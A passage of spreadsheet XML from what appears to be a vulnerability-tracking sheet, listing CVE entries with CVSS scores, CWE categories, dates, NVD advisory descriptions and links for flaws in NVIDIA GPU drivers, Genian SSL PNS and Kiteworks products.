      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin) where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC call to the host. A successful exploit of this vulnerability might lead to escalation of privileges, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47496</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47580</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause a missing authorization issue. A successful exploit of this vulnerability might lead to information disclosure and data tampering.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47580</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76143</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in Genian SSL PNS allows an attacker to bypass multi-factor authentication by manipulating a login request parameter.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76143</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102089</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to a path traversal weakness in an administrative import function allowed an authenticated administrator to write files to arbitrary locations on the server. This could potentially be leveraged to execute arbitrary code on the underlying system.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102089</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102093</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Improper Privilege Management and does not correctly enforce restrictions on role assignment, which could allow an authenticated administrative user with limited, non-Sysadmin role-management permissions to elevate another user to full system-administrator privileges beyond those the administrative user was authorized to grant.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102093</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102094</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Unsafe Reflection and does not sufficiently restrict the code that the mail-processing pipeline could load from an imported rule configuration. An authenticated administrator with mail-rule configuration privileges could cause the gateway to load and execute code beyond the approved set of mail-processing components, potentially in the context of the mail-gateway service account.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102094</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102096</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to OS Command Injection that allows an authenticated administrator to upload a configuration package whose contents were not sufficiently validated before being processed. A crafted package could cause the underlying system to execute arbitrary operating-system commands, potentially with elevated privileges, on the affected appliance.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102096</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102097</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Remote Code Execution. Kiteworks Email Protection Gateway allowed an authenticated administrator to import configuration whose contents were not sufficiently validated before being processed. A crafted submission could potentially allow arbitrary commands to be executed on the affected gateway.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102097</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102098</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to SQL Injection. A stored SQL injection vulnerability in a Kiteworks administrative reporting feature could allow an authenticated administrator to read sensitive data from the underlying database and to affect the availability of the service. Exploitation requires an existing, authenticated administrative account with access to the affected reporting function.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102098</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102099</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Arbitrary File Write. An improper restriction of a user-supplied file path in a Kiteworks administrative export feature could allow an authenticated administrator to write a file to an arbitrary location on the underlying host, potentially leading to command execution on the appliance. Exploitation requires an existing, authenticated administrative account with access to the affected export function.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102099</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102108</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator of Kiteworks Email Protection Gateway could submit a crafted serialized object to a cluster management interface that was deserialized without sufficient validation, potentially allowing arbitrary code execution in the context of the gateway service account. Exploitation requires an administrator account holding a specific queue-management privilege.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102108</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102114</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in Kiteworks could allow a high-privileged authenticated administrator to execute arbitrary operating-system commands as root on the affected appliance node. Successful exploitation requires an administrative account with elevated privileges.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102114</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102116</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-91</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>-A weakness could have allowed an authenticated Kiteworks Email Protection Gateway administrator to write a file outside its intended location and cause the application to execute it, potentially resulting in remote code execution as the underlying service account.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102116</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102117</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-807, CWE-940</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>On deployments where the remote-support capability is licensed and enabled, an authenticated System Administrator who also possessed the key protecting the submitted data could redirect the underlying system's outbound support connection to a destination of their choosing. That destination could then have operating-system commands executed on the node and receive their output, potentially resulting in remote code execution with the privileges of a local service account.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102117</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102119</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>A path traversal weakness in an optional, non-default administrative feature allowed an authenticated administrator to move files to unintended locations outside the feature's designated directory. This could potentially be leveraged to execute arbitrary code on the underlying system.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102119</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102129</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>A user-provisioning interface in Kiteworks Core did not verify that the requesting administrator was entitled to grant the role being assigned. An administrator whose delegated permissions covered role changes alone could therefore raise an account to full system-administrator privileges.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102129</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102130</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
